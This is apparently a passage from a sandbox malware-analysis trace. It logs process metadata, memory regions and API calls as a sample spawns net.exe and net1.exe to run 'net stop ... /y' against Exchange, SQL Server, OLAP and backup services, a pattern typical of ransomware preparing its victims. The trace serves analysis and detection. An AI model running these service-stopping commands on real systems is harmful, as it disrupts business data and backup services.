[0101.858] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMTA") returned 5 [0101.858] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMTA") returned 10 [0101.858] _wcsicmp (_String1="work", _String2="MSEXCHANGEMTA") returned 10 [0101.858] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMTA") returned 10 [0101.858] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMTA") returned 3 [0101.858] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMTA") returned -9 [0101.858] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMTA") returned -1 [0101.858] _wcsicmp (_String1="server", _String2="MSEXCHANGEMTA") returned 6 [0101.858] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMTA") returned 6 [0101.858] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMTA") returned 6 [0101.858] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMTA") returned -1 [0101.858] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMTA") returned -12 [0101.858] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMTA") returned 1 [0101.859] NetServiceControl (in: servername=0x0, service="MSEXCHANGEMTA", opcode=0x0, arg=0x0, bufptr=0x12f8d0 | out: bufptr=0x12f8d0) returned 0x889 [0101.859] wcscpy_s (in: _Destination=0xff6580d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0101.859] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0101.860] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff655b50, nSize=0x800, Arguments=0xff657f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0101.861] GetFileType (hFile=0xb) returned 0x2 [0101.861] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f798 | out: lpMode=0x12f798) returned 1 [0101.861] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff655b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f790, lpReserved=0x0 | out: lpBuffer=0xff655b50*, lpNumberOfCharsWritten=0x12f790*=0x1e) returned 1 [0101.862] GetFileType (hFile=0xb) returned 0x2 [0101.862] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f798 | out: lpMode=0x12f798) returned 1 [0101.862] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff631efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f790, lpReserved=0x0 | out: lpBuffer=0xff631efc*, lpNumberOfCharsWritten=0x12f790*=0x2) returned 1 [0101.862] _ultow (in: _Dest=0x889, _Radix=1243136 | out: _Dest=0x889) returned="2185" [0101.862] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff655b50, nSize=0x800, Arguments=0xff657f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0101.863] GetFileType (hFile=0xb) returned 0x2 [0101.863] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f798 | out: lpMode=0x12f798) returned 1 [0101.863] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff655b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f790, lpReserved=0x0 | out: lpBuffer=0xff655b50*, lpNumberOfCharsWritten=0x12f790*=0x34) returned 1 [0101.863] GetFileType (hFile=0xb) returned 0x2 [0101.863] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f798 | out: lpMode=0x12f798) returned 1 [0101.864] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff631efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f790, lpReserved=0x0 | out: lpBuffer=0xff631efc*, lpNumberOfCharsWritten=0x12f790*=0x2) returned 1 [0101.864] NetApiBufferFree (Buffer=0x334d50) returned 0x0 [0101.864] NetApiBufferFree (Buffer=0x33c100) returned 0x0 [0101.864] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMTA /y" [0101.864] exit (_Code=2) Process: id = "169" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x59348000" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSOLAP$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7128 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7129 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7130 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7131 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 7132 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7133 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7134 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7135 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7136 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7137 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7138 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7139 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7140 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 7141 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7142 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 603 os_tid = 0x12ac Process: id = "170" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x58868000" os_pid = "0x9a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSOLAP$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7143 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7144 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7145 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7146 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7147 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7148 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7149 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7150 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7151 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7152 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7153 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 7154 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7155 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7156 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7157 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 605 os_tid = 0x1204 Process: id = "171" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x55f88000" os_pid = "0x121c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7178 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7179 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7180 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7181 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7182 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7183 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7184 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7185 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7186 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7187 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7188 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7189 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7190 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 7191 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7192 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 607 os_tid = 0x1288 Process: id = "172" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58d26000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "163" os_parent_pid = "0x420" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeSRS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7193 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7194 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7195 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7196 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7197 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7198 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7199 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7200 start_va = 0xffb60000 end_va = 0xffb92fff entry_point = 0xffb60000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7201 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7202 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7203 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 7204 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7205 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 7206 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7207 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7208 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7209 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7210 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7211 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 7212 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7213 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7214 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7215 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7216 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7217 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7218 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7219 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7220 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7221 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7222 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7223 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7224 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7225 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7226 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7227 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7228 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7229 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7230 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7231 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 609 os_tid = 0xa0c [0102.113] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef8b0 | out: lpSystemTimeAsFileTime=0xef8b0*(dwLowDateTime=0xf2080b50, dwHighDateTime=0x1d48689)) [0102.113] GetCurrentProcessId () returned 0xb40 [0102.113] GetCurrentThreadId () returned 0xa0c [0102.113] GetTickCount () returned 0x234c5 [0102.113] QueryPerformanceCounter (in: lpPerformanceCount=0xef8b8 | out: lpPerformanceCount=0xef8b8*=1814903100000) returned 1 [0102.114] GetModuleHandleW (lpModuleName=0x0) returned 0xffb60000 [0102.114] __set_app_type (_Type=0x1) [0102.114] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb79c9c) returned 0x0 [0102.115] __getmainargs (in: _Argc=0xffb84780, _Argv=0xffb84790, _Env=0xffb84788, _DoWildCard=0, _StartInfo=0xffb8479c | out: _Argc=0xffb84780, _Argv=0xffb84790, _Env=0xffb84788) returned 0 [0102.115] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0102.115] GetConsoleOutputCP () returned 0x1b5 [0102.127] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb8cec0 | out: lpCPInfo=0xffb8cec0) returned 1 [0102.127] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0102.132] sprintf_s (in: _DstBuf=0xef858, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0102.132] setlocale (category=0, locale=".437") returned="English_United States.437" [0102.134] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.134] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0102.134] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSRS /y" [0102.134] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef5f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0102.134] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0102.134] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xef848 | out: Buffer=0xef848*=0x1d4d50) returned 0x0 [0102.135] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xef848 | out: Buffer=0xef848*=0x1dc100) returned 0x0 [0102.135] _fileno (_File=0x7fefdba2a80) returned 0 [0102.135] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0102.135] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0102.135] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0102.135] _wcsicmp (_String1="config", _String2="stop") returned -16 [0102.135] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0102.135] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0102.135] _wcsicmp (_String1="file", _String2="stop") returned -13 [0102.135] _wcsicmp (_String1="files", _String2="stop") returned -13 [0102.135] _wcsicmp (_String1="group", _String2="stop") returned -12 [0102.135] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0102.135] _wcsicmp (_String1="help", _String2="stop") returned -11 [0102.135] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0102.135] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0102.136] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0102.136] _wcsicmp (_String1="session", _String2="stop") returned -15 [0102.136] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0102.136] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0102.136] _wcsicmp (_String1="share", _String2="stop") returned -12 [0102.136] _wcsicmp (_String1="start", _String2="stop") returned -14 [0102.136] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0102.136] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0102.136] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0102.136] _wcsicmp (_String1="accounts", _String2="MSExchangeSRS") returned -12 [0102.136] _wcsicmp (_String1="computer", _String2="MSExchangeSRS") returned -10 [0102.136] _wcsicmp (_String1="config", _String2="MSExchangeSRS") returned -10 [0102.136] _wcsicmp (_String1="continue", _String2="MSExchangeSRS") returned -10 [0102.136] _wcsicmp (_String1="cont", _String2="MSExchangeSRS") returned -10 [0102.136] _wcsicmp (_String1="file", _String2="MSExchangeSRS") returned -7 [0102.136] _wcsicmp (_String1="files", _String2="MSExchangeSRS") returned -7 [0102.136] _wcsicmp (_String1="group", _String2="MSExchangeSRS") returned -6 [0102.136] _wcsicmp (_String1="groups", _String2="MSExchangeSRS") returned -6 [0102.137] _wcsicmp (_String1="help", _String2="MSExchangeSRS") returned -5 [0102.137] _wcsicmp (_String1="helpmsg", _String2="MSExchangeSRS") returned -5 [0102.137] _wcsicmp (_String1="localgroup", _String2="MSExchangeSRS") returned -1 [0102.137] _wcsicmp (_String1="pause", _String2="MSExchangeSRS") returned 3 [0102.137] _wcsicmp (_String1="session", _String2="MSExchangeSRS") returned 6 [0102.137] _wcsicmp (_String1="sessions", _String2="MSExchangeSRS") returned 6 [0102.137] _wcsicmp (_String1="sess", _String2="MSExchangeSRS") returned 6 [0102.137] _wcsicmp (_String1="share", _String2="MSExchangeSRS") returned 6 [0102.137] _wcsicmp (_String1="start", _String2="MSExchangeSRS") returned 6 [0102.137] _wcsicmp (_String1="stats", _String2="MSExchangeSRS") returned 6 [0102.137] _wcsicmp (_String1="statistics", _String2="MSExchangeSRS") returned 6 [0102.137] _wcsicmp (_String1="stop", _String2="MSExchangeSRS") returned 6 [0102.137] _wcsicmp (_String1="time", _String2="MSExchangeSRS") returned 7 [0102.137] _wcsicmp (_String1="user", _String2="MSExchangeSRS") returned 8 [0102.137] _wcsicmp (_String1="users", _String2="MSExchangeSRS") returned 8 [0102.137] _wcsicmp (_String1="msg", _String2="MSExchangeSRS") returned 2 [0102.137] _wcsicmp (_String1="messenger", _String2="MSExchangeSRS") returned -14 [0102.137] _wcsicmp (_String1="receiver", _String2="MSExchangeSRS") returned 5 [0102.137] _wcsicmp (_String1="rcv", _String2="MSExchangeSRS") returned 5 [0102.138] _wcsicmp (_String1="netpopup", _String2="MSExchangeSRS") returned 1 